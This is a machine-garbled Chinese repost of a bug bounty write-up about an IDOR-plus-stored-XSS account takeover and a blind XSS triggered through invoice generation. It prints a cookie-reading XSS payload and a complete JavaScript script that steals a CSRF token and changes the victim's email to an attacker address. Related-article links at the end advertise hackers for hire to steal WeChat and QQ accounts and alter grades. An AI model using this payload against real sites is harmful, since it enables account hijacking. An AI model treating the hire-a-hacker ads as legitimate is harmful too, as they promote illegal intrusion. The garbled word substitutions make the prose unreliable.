记我的一次账号绑架和BLIND XSS缝隙发现进程

访客5年前黑客资讯714


大家好,本文我要共享的是我参加Hackerone某约请项目,经过方针测验网站的高档功能模块(PRO features)完成了更多攻击面测验,并发现了两个严峻缝隙,获得了$7000美金的不菲奖赏。
之一个缝隙-账号绑架
我发现的之一个缝隙便是不安全方针引证缝隙(IDOR),使用该缝隙我能在每个账户中创立一个 ​element x元素,经过和朋友的沟通,他主张我能够试试在其间注入一些 javascript 脚本,所以我就在某文本区域的 element x 中刺进了以下Payload脚本,完成了用XSS *** 对账户cookie的读取。
‘%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E
IDOR:不安全的直接方针引证答应攻击者绕过网站的身份验证机制,并经过修正指向方针链接中的参数值来直接拜访方针方针资源,这类资源能够是归于其他用户的数据库条目以及服务器体系中的隐私文件等等。导致这种状况呈现的原因是,体系在承受用户输入并使用输入信息获取方针之前没有对用户身份权限进行检测。
现在,有了这种IDOR缝隙下的存储型XSS使用途径,并且方针测验网站又没有设置CSP的白名单机制,因而我能够结构一段小脚本,让这段脚原本盗取受害用户的CSRF令牌认证信息(CSRF token),这样能够修正其emailID或以办理员身份把对方添加为好友,直接完成对受害者的账户绑架。
与IDOR缝隙使用相同, javascript 脚本能够在全部账户中完成长途存储,然后经过结构运转,完成对全部方针网站注册账户的绑架,这便是XSS和IDOR缝隙的结合威力。我终究的 javascript Payload使用脚本如下:
function stealEmailToken()
{
var fetchHash = new XMLHttpRequest();
var url = "https://--domain--/--path--/personal/update_email.html";
var datax;
var all_elements;
var vc_email_token='initial';
fetchHash.onreadystatechange=function ()
{
if(fetchHash.readyState==4 && fetchHash.status==200)
{
datax = fetchHash.responseText;
var loot = document.createElement('html');
loot.innerHTML = datax;
all_elements = loot.getElementsByTagName( 'input' );
vc_email_token = all_elements[2].value;
alert('Stole your Email change Token: '+vc_email_token+' ...Tabahi');
//hack(vc_email_token);
}
}
fetchHash.open("GET",url, true);
fetchHash.withCredentials=true;
fetchHash.send();
}
stealEmailToken();
function hack(emailToken)
{
var HackAccount = new XMLHttpRequest();
url= "https://--domain--/--path--/personal/update_email.html";
HackAccount .open("POST",url, true);
HackAccount .withCredentials=true;
var
 data=
'AccountEmailForm%5BsEmail%5D%5Bfirst%5D=attacker%40attacker.com&AccountEmailForm%5BsEmail%5D%5Bsecond%5D=attacker%40attacker.com&AccountEmailForm%5B_token%5D='+emailToken
 ;
HackAccount .setRequestHeader('X-Requested-With','XMLHttpRequest');
HackAccount .setRequestHeader('Content-Type','application/x-www-form-urlencoded');
HackAccount .send(data);
}
这个脚本中,我能从…personal/update_email.html的账户页面中读取 input 元素的  csrf token ,然后使用 hack() 函数来把这个盗取来的 csrf token发送一个更改用户email ID的POST恳求,终究完成账户绑架。上报这个缝隙之后,厂商团队立刻就进行了修正,之后,我也获得了奖赏的$3500赏金。
第二个缝隙 – BLIND XSS
因为方针测验网站注册有付费版的专业高档功能模块,所以我决议付钱来购买进行测验。这个购买付费 *** 有两种,也即信用卡和银行转账。在银行转账 *** 中,会生成一个电子发票并能依照用户在记账时输入的名字邮箱地址等信息,以电邮 *** 发送到用户邮箱中。
因而,在pdf电子发票的生成过程中,我能够尝试着在其间注入一些html元素来看看是否能直接履行脚本,可是,这种 *** 是行不通的。
之后,我就在其间刺进了一个使用 XSSHunter 生成的 BLIND XSS Payload,全部就静等上钩吧。几天之后,我无意间阅读了我的XSSHunter账户,出人意料地发现,那段刺进的BLIND XSS Payload居然在方针测验网站的控制面板办理区域被成功触发了!
XSS Payload成功履行的一同,也一同生成了pdf的电子发票,也便是在这种电子发票主动生成过程中,体系未对输入作安全过滤,导致能够履行XSS

[1] [2]  黑客接单网

相关文章

淘宝有黑客接单吗_有没有黑客可以帮忙找苹果手机号

解码/解混杂代码V3版别每个缝隙运用程序中的主编码有用载荷运用WMIC进行体系剖析,以承认恰当的依靠于操作体系的POSHC2植入程序,并将名为“Media.ps1”的PowerShell脚本保存在用户...

日志剖析脚本

脚本如下: #!/bin/sh ############################################### #                                   ...

黑客在线接单多少钱,找黑客黑掉微信号,找黑客帮忙找个人

答案当然是否定的。 /// 写vbs脚本 /// </summary>EscapeShellCmd()函数能够把一个字符串中所有或许瞒过Shell而去履行别...

winrar密码破解工具,黑客定位如何联系管理员,找黑客解锁苹果手机软件

在某些情况下,运用正常的SQL注入是无效的。 在这种时分SQL盲注就会派上用场了。 SQL盲注进犯的要点便是有用和无效查询之间的差异。 用户有必要将句子查询设置为有用和无效状况,并调查其呼应。 2,获...

黑客接单免定金,可以找k黑客把QQ盗回来不,传奇黑客怎么找

咱们将会持续对遭到侵略的网站进行盯梢和剖析,咱们希望对这些现代缝隙运用东西有更深化的了解,并向咱们的客户供给最大程度的安全维护。 获取用户名暗码b)怎么打断遥控器本来和无人机之间的安稳射频链路,并一起...

怎么查开房_找网络黑客-天津大学找黑客改成绩

「怎么查开房_找网络黑客-天津大学找黑客改成绩」5、动感购物体系,呵呵。 想到了明小子:这一关是关于find和du指令的运用。 因为文件具有1033的巨细,经过找男人(man)指令检查du的手册,发现...